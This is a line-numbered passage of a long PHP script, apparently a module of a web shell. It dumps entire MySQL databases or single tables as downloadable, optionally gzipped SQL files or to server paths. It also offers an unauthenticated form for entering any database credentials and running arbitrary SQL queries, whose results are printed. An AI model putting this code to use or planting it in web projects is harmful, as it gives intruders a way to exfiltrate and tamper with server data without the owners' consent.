3568$dump_file=gzencode($dump_file);
3569header('Content-Length: '.strlen($dump_file)."\n");
3570echo($dump_file);
3571}
3572else if($t_f)
3573{
3574fclose($t_f);
3575echo('Dump for '.$db_dump.' now in '.$to_file);
3576}
3577}
3578else
3579{
3580$result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link);
3581if(!$result2)echo('error table '.$table_dump);
3582else
3583{
3584if(!$to_file)
3585{
3586header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
3587header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
3588}
3589if($to_file===false)
3590{
3591header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
3592header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
3593}
3594$dump_file.="create table `{$table_dump}`(\n";
3595for($j=0;$j<mysql_num_rows($result2)-1;$j++)
3596{
3597$rows2=mysql_fetch_array($result2);
3598$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
3599}
3600$rows2=mysql_fetch_array($result2);
3601$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
3602$type[$j]=$rows2[1];
3603$dump_file.=");\n";
3604mysql_free_result($result2);
3605$result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link);
3606$columns=$j-1;
3607for($j=0;$j<mysql_num_rows($result2);$j++)
3608{
3609$rows2=mysql_fetch_array($result2);
3610$dump_file.='insert into `'.$table_dump.'` values (';
3611for($k=0;$k<$columns;$k++)
3612{
3613$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
3614}
3615$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
3616if($archive=='none')
3617{
3618if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
3619else
3620{
3621echo($dump_file);
3622ob_flush();
3623}
3624$dump_file='';
3625}
3626}
3627mysql_free_result($result2);
3628if($archive!='none')
3629{
3630$dump_file=gzencode($dump_file);
3631header('Content-Length: '.strlen($dump_file)."\n");
3632echo $dump_file;
3633}else if($t_f)
3634{
3635fclose($t_f);
3636echo('Dump for '.$db_dump.' now in '.$to_file);
3637}
3638}
3639}
3640}
3641}
3642break;
3643}
3644case 'query' :
3645{
3646echo($head);
3647?>
3648<hr>
3649<form method=post>
3650<table>
3651<td>
3652<table align=left>
3653<tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host'
3654
3655type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr>
3656<tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr>
3657</table>
3658</td>
3659<td>
3660<table>
3661<tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr>
3662<tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
3663<input name='archive' type=radio value='none'>without arch
3664<input name='archive' type=radio value='gzip' checked=true>gzip archive
3665<tr><td><input type=submit name='action' value='dump'></td></tr>
3666<tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr>
3667</table>
3668</td>
3669</table>
3670<input name='page' value='mysql' type=hidden>
3671<input name='action' value='query' type=submit>
3672</form>
3673<hr>
3674<?
3675$mysql_link=@mysql_connect($host,$user,$passwd);
3676if(!($mysql_link)) echo('Connect error');
3677else
3678{
3679if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;}
3680//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
3681$result=@mysql_query($query,$mysql_link);
3682if(!($result))echo(mysql_error());
3683else
3684{
3685echo("<table valign=top align=left>\n<tr>");
3686for($i=0;$i<mysql_num_fields($result);$i++)
3687echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b> </td>');
3688echo("\n</tr>\n");
3689for($i=0;$i<mysql_num_rows($result);$i++)
3690{
3691$rows=mysql_fetch_array($result);
3692echo('<tr valign=top align=left>');
3693for($j=0;$j<mysql_num_fields($result);$j++)
3694{
3695echo('<td>'.(htmlspecialchars($rows[$j])).'</td>');
3696}
3697echo("</tr>\n");
3698}
3699echo("</table>\n");
3700}
3701mysql_close($mysql_link);
3702}
3703break;
3704}
3705}
3706break;
3707}
3708}
3709?>